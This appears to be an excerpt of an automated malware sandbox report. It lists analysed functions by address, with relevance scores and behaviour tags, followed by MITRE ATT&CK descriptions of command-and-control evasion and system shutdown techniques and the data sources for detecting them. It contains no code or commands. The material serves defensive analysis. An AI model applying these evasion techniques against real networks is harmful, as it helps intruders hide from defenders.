Function 100041FD, Relevance: 3.1, APIs: 2, Instructions: 52
processCOMMON

Function 004065C1, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 00403A60, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 208
memoryCOMMON

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Function 73CA22F1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140
memoryCOMMON

Function 100036E7, Relevance: 10.7, APIs: 7, Instructions: 237
fileCOMMON

Function 0040583A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Function 004065E8, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 100042A0, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207
filememoryCOMMON

Function 00405E15, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 73CA16DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 004032BF, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
COMMON

Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Function 004031B7, Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 00406656, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre